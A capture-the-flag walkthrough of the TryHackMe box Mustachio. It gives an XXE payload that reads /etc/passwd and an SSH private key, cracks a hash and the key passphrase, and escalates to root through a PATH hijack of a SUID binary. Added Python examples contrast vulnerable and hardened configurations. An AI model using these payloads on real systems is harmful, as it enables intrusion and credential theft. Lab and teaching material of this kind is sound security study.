{THM} Mustachio
After a long break, I'm back with a new machine. This time I chose Mustachio from TryHackMe. This machine requires us to understand how XML works and how to exploit it. By the end of it I still wanted to practise more, especially XML exploitation and hardening.
Let's boot2root this machine.
As usual, always start by scanning for open ports. I like to use nmap with a basic command like the one below (-A already implies -sC and -sV, so the command is a little redundant but harmless; -oN writes a normal-format log):
sudo nmap -sC -sV -A -T4 THM_Machine -oN nmap/mustachio
The default scan only covers the top 1000 ports and there is nothing much to work with, so next I modify the command to scan every port and list only the open ones.
sudo nmap -p- --open THM_machine
We get something interesting here: two web servers, on ports 80 and 8765.
Next, brute-force the directories on port 80 to find any information we can use.
After a few minutes we get some interesting directories. Let's see what they are.
Let's download the user.bak file to our machine.
Waiting…
Once the download completes, let's see what's inside.
Running file on it shows it is an SQLite database, and dumping the table shows it contains credentials: a username and a password hash.
Oh wait, credentials? Let's crack the hash using CrackStation.
admin : bulldog19
Hmm, we have credentials but there is no login page on port 80. Now we move to port 8765.
Landing on this port, we get a login page. VOILA! Put in the credentials we found before.
Hmm, at first I had no idea what to do. After looking at the page source I found something interesting.
We get two pieces of information here.
The URL in the source looks like a hole? I don't think so, because the source shows another, more interesting part. Remember this landing page: when we submit anything, the request body is XML, and the expected format looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>This paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could've done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could've been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
After looking at some payloads and exploitation write-ups, I found a suitable XML payload: an external entity (XXE) declared in the DOCTYPE, which the server's parser resolves by reading a local file and echoing its contents back inside the <name> element.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>
And we manage to inject XML here: /etc/passwd comes back in the response. That means we can retrieve the id_rsa private key
for the barry user.
Barry? Yes. The page source we looked at earlier mentioned Barry connecting over SSH.
Next, use the same template, changing the requested file to
file:///home/barry/.ssh/id_rsa
And we get the private key. Copy it out of the response exactly as it is, including the BEGIN/END lines and the original line breaks, otherwise ssh will refuse to load it. Let's move to the next step.
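To show exactly what the server's parser is doing with that DOCTYPE, here is an added example (not code from the post or the challenge): a small SAX-based parser for the <comment> format in three configurations. The first resolves external general entities, which is the misconfiguration behind this box; the second only disables that feature; the third refuses any DOCTYPE outright, which is the hardening a comment form should have. The secret file it reads is a constructed stand-in for /home/barry/.ssh/id_rsa created in a temporary directory, so nothing on the real filesystem is touched.

```python
"""XXE against the <comment> format, vulnerable vs hardened parsing.
Added example; the file read is a constructed stand-in, not the box's key."""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler
from xml.sax.handler import ContentHandler


class CommentHandler(ContentHandler):
    """Collects the text inside <name>, <author> and <com>."""

    FIELDS = ("name", "author", "com")

    def __init__(self):
        super().__init__()
        self.fields = {f: "" for f in self.FIELDS}
        self._current = None

    def startElement(self, name, attrs):
        if name in self.FIELDS:
            self._current = name

    def endElement(self, name):
        if name == self._current:
            self._current = None

    def characters(self, content):
        # Text from a resolved external entity arrives here as well, which
        # is how file contents end up inside <name> in the server's reply.
        if self._current:
            self.fields[self._current] += content


def build_xxe_payload(uri: str) -> bytes:
    """Same shape as the payload in the post; only the SYSTEM URI varies."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE replace [<!ENTITY ent SYSTEM "{uri}"> ]>\n'
        "<comment>\n"
        "  <name>&ent;</name>\n"
        "  <author>Barry Clad</author>\n"
        "  <com>Hiiii</com>\n"
        "</comment>\n"
    ).encode()


def parse_comment(xml_bytes: bytes, resolve_external: bool = False,
                  reject_doctype: bool = True) -> dict:
    """resolve_external=True reproduces the vulnerable configuration: external
    general entities (file://, http://) are fetched and inlined.
    reject_doctype=True is the hardening: a comment never needs a DTD, so any
    DOCTYPE is refused before the parser sees it, regardless of parser flags."""
    if reject_doctype and b"<!DOCTYPE" in xml_bytes:
        raise ValueError("DOCTYPE not allowed in comment submissions")
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    h = CommentHandler()
    parser.setContentHandler(h)
    parser.parse(io.BytesIO(xml_bytes))
    return h.fields


def demo() -> dict:
    """Runs the payload through all three configurations against a constructed
    secret file (stand-in for /home/barry/.ssh/id_rsa)."""
    with tempfile.TemporaryDirectory() as d:
        secret_path = os.path.join(d, "id_rsa")
        with open(secret_path, "w") as f:
            f.write("-----BEGIN CONSTRUCTED KEY-----\nnot-a-real-key\n")
        payload = build_xxe_payload(Path(secret_path).as_uri())

        leaked = parse_comment(payload, resolve_external=True,
                               reject_doctype=False)["name"]
        flag_only = parse_comment(payload, resolve_external=False,
                                  reject_doctype=False)["name"]
        try:
            parse_comment(payload)  # defaults are the hardened settings
            blocked = False
        except ValueError:
            blocked = True
    return {"vulnerable": leaked, "flag_only": flag_only,
            "hardened_blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The middle configuration matters for defenders: with entity resolution off the entity silently expands to nothing, so the form still "works" and the attempt leaves no error to alert on. Rejecting the DOCTYPE fails loudly, which is both safer and easier to detect in logs.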
Since we already have the private key, copy it into a file and convert it into a hash before cracking the passphrase.
ssh2john id_rsa > rsa_key
john --wordlist=<wordlistpath> rsa_key
After a few minutes we have the passphrase we can use to log in over SSH.
Before that, restrict the permissions on the key file, or ssh will refuse to use it:
chmod 600 id_rsa
ssh -i id_rsa barry@<THM_machine>
Now we're in as barry!
As usual, the first flag is in the home directory. We have the user flag.
Next we proceed to privilege escalation to root. We can't check sudo permissions here since we don't have barry's password. Another method is to look for SUID binaries with find:
find / -perm -u=s -type f 2>/dev/null
Or use linpeas.
We find something interesting: /home/joe/live_log, a SUID binary. Looking at the strings in this file shows that it runs tail on the web server's access log without an absolute path, so the shell it spawns resolves tail through PATH. That means we can replace tail with our own payload.
We need to put barry's home directory at the front of PATH:
export PATH=/home/barry:$PATH
Create a fake tail there and put the payload in it:
echo "/bin/bash" > tail
chmod +x tail
Run /home/joe/live_log
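The PATH hijack above, as an added example that is not the box's binary: a stand-in shell script plays the role of /home/joe/live_log and calls tail by bare name, a second variant pins PATH to trusted directories first, and a fake tail planted in a directory standing in for /home/barry records whether it was executed. The SUID bit is not needed to show the mechanism, so the stand-in runs as the current user; paths, the log line and the marker-file payload are all constructed for this example.

```python
"""PATH hijack of a program that calls `tail` by bare name.
Added example; the victim scripts, log and payload are constructed stand-ins."""
import os
import re
import stat
import subprocess
import tempfile

# What the vulnerable program effectively does: run "tail ... <log>" through
# the shell with the caller's PATH untouched.
VULNERABLE_SRC = '#!/bin/sh\ntail -n 1 "$1"\n'
# Hardened variant: reset PATH to trusted directories before any bare command
# (calling /usr/bin/tail by absolute path would work just as well).
HARDENED_SRC = '#!/bin/sh\nPATH=/usr/bin:/bin\nexport PATH\ntail -n 1 "$1"\n'


def write_exec(path: str, content: str) -> None:
    with open(path, "w") as f:
        f.write(content)
    mode = os.stat(path).st_mode
    os.chmod(path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)


def calls_tail_by_bare_name(binary: str) -> bool:
    """Triage heuristic equivalent to `strings live_log | grep tail`: true if
    the file references tail without a directory in front of it. It flags the
    hardened variant too, so it finds candidates; the run below confirms."""
    with open(binary, "rb") as f:
        data = f.read()
    return re.search(rb"(?<![/\w])tail\b", data) is not None


def run_with_hijack(victim: str, hijack_dir: str, log: str) -> bool:
    """Plant a fake tail in hijack_dir (stands in for /home/barry), prepend
    that directory to PATH as in the post, run the victim and report whether
    the fake tail executed. The real payload was /bin/bash; here it only
    drops a marker file so the result can be checked."""
    marker = os.path.join(hijack_dir, "hijacked")
    if os.path.exists(marker):
        os.remove(marker)
    write_exec(os.path.join(hijack_dir, "tail"),
               f'#!/bin/sh\ntouch "{marker}"\n')
    env = dict(os.environ)
    env["PATH"] = hijack_dir + os.pathsep + env.get("PATH", "/usr/bin:/bin")
    subprocess.run(["/bin/sh", victim, log], env=env,
                   capture_output=True, check=False)
    return os.path.exists(marker)


def demo() -> dict:
    with tempfile.TemporaryDirectory() as d:
        log = os.path.join(d, "access.log")
        with open(log, "w") as f:
            f.write('10.0.0.5 - - "GET / HTTP/1.1" 200\n')  # constructed line
        victim = os.path.join(d, "live_log")
        fixed = os.path.join(d, "live_log_fixed")
        write_exec(victim, VULNERABLE_SRC)
        write_exec(fixed, HARDENED_SRC)
        hijack_dir = os.path.join(d, "barry")
        os.mkdir(hijack_dir)
        return {
            "bare_tail_reference": calls_tail_by_bare_name(victim),
            "vulnerable_hijacked": run_with_hijack(victim, hijack_dir, log),
            "hardened_hijacked": run_with_hijack(fixed, hijack_dir, log),
        }


if __name__ == "__main__":
    print(demo())
```

On the real box the payload is a shell; if the shell you get back has dropped its effective UID, bash -p keeps it, since bash otherwise resets euid to uid when they differ.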
Yippee, we are now root. Find the root flag and this machine is ours!
GAMEOVER! :D